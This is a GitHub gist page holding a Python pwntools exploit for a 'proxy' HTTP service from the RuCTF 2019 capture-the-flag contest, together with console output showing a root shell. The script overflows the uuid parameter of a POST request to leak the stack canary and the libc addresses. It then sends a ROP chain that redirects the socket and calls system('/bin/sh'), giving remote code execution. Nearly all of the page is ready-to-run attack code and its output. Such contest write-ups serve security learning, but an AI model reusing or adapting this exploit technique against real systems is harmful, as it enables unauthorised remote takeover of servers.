root@kali:/mnt/hgfs/f/sandbox/proxy# ./sandbox_rce.py
[+] Opening connection to 127.0.0.1 on port 16780: Done
[*] Closed connection to 127.0.0.1 port 16780
[+] Opening connection to 127.0.0.1 on port 16780: Done
Stack canary: 00667104293168fb proxy base: 0x5611dcb23000 libc base: 0x7ff23c8f9000
[*] Switching to interactive mode
foo\x00uuid\x0041414141414141414141414sh: turning off NDELAY mode
$ id
uid=0(root) gid=0(root) groups=0(root)
$ pwd
/root/proxy
$ ls -la
total 8140
drwxr-xr-x 1 root root 4096 Apr 29 21:49 .
drwx------ 1 root root 4096 Apr 29 21:45 ..
-rwxrwxrwx 1 root root 46 Apr 28 14:13 .gitignore
-rwxrwxrwx 1 root root 168 Apr 28 14:13 Dockerfile
-rwxrwxrwx 1 root root 494 Apr 28 14:13 Makefile
-rwxrwxrwx 1 root root 103 Apr 28 14:13 docker_build.sh
-rwxrwxrwx 1 root root 288 Apr 28 14:13 gen_hash.py
-rwxrwxrwx 1 root root 28 Apr 28 14:13 hash.h
-rwxrwxrwx 1 root root 8267 Apr 28 14:13 httpserver.cpp
-rwxrwxrwx 1 root root 4619 Apr 28 14:13 httpserver.h
-rwxrwxrwx 1 root root 569 Apr 28 14:13 interface.h
-rwxr-xr-x 1 root root 2030544 Apr 29 21:45 libc.so.6
-rwxrwxrwx 1 root root 30768 Apr 29 17:31 libinterface.so
-rwxrwxrwx 1 root root 4302 Apr 28 14:13 main.cpp
-rwxrwxrwx 1 root root 452976 Apr 28 14:20 proxy
$
Last active
April 30, 2019 05:28
-
-
Save v0s/1933e025dc61c2dfe32a61f79b959c11 to your computer and use it in GitHub Desktop.
Sandbox ROP RCE (ructf 2019)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from pwn import * | |
host = args.HOST or "127.0.0.1" | |
port = args.PORT or "16780" | |
io = remote(host, port) | |
payload = "A"*52 + p32(4) + "A"*4 + p64(0x3ff) | |
io.send("POST /add_unit?mind=foo&uuid=" + enhex(payload).upper() + " HTTP/1.1\r\n" | |
+ "Host: 127.0.0.1:16780\r\n" | |
+ "User-Agent: curl/7.64.0\r\n" | |
+ "Accept: */*\r\n" | |
+ "Content-Length: 0\r\n" | |
+ "\r\n") | |
leak = io.recvrepeat(0x400) | |
io.close() | |
io = remote(host, port) | |
stack_canary = leak[0x48:0x50] | |
proxyBase = u64(leak[0x58:0x60]) - 0x3C3D | |
libcBase = u64(leak[0x2c8:0x2d0]) - 0x130EA6 | |
print "Stack canary:", enhex(stack_canary), "proxy base:", hex(proxyBase), "libc base:", hex(libcBase) | |
rop = "" | |
rop += p64(libcBase + 0x0002155f)#: pop rdi ; ret ; (490 found) | |
rop += p64(4) | |
rop += p64(libcBase + 0x00023e6a)#: pop rsi ; ret ; (147 found) | |
rop += p64(0) | |
rop += p64(libcBase + 0x1109A0)#dup2 | |
rop += p64(libcBase + 0x0002155f)#: pop rdi ; ret ; (490 found) | |
rop += p64(4) | |
rop += p64(libcBase + 0x00023e6a)#: pop rsi ; ret ; (147 found) | |
rop += p64(1) | |
rop += p64(libcBase + 0x1109A0)#dup2 | |
rop += p64(libcBase + 0x0002155f)#: pop rdi ; ret ; (490 found) | |
rop += p64(4) | |
rop += p64(libcBase + 0x00023e6a)#: pop rsi ; ret ; (147 found) | |
rop += p64(2) | |
rop += p64(libcBase + 0x1109A0)#dup2 | |
rop += p64(libcBase + 0x0002155f)#: pop rdi ; ret ; (490 found) | |
rop += p64(libcBase + 0x01B3E9A)#"/bin/sh" | |
rop += p64(libcBase + 0x4F440)#system | |
payload = "A"*52 + p32(4) + "A"*4 + p64(0) + stack_canary + "B"*8 + rop | |
io.send("POST /add_unit?mind=foo&uuid=" + enhex(payload).upper() + " HTTP/1.1\r\n" | |
+ "Host: 127.0.0.1:16780\r\n" | |
+ "User-Agent: curl/7.64.0\r\n" | |
+ "Accept: */*\r\n" | |
+ "Content-Length: 0\r\n" | |
+ "\r\n") | |
io.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Агонь!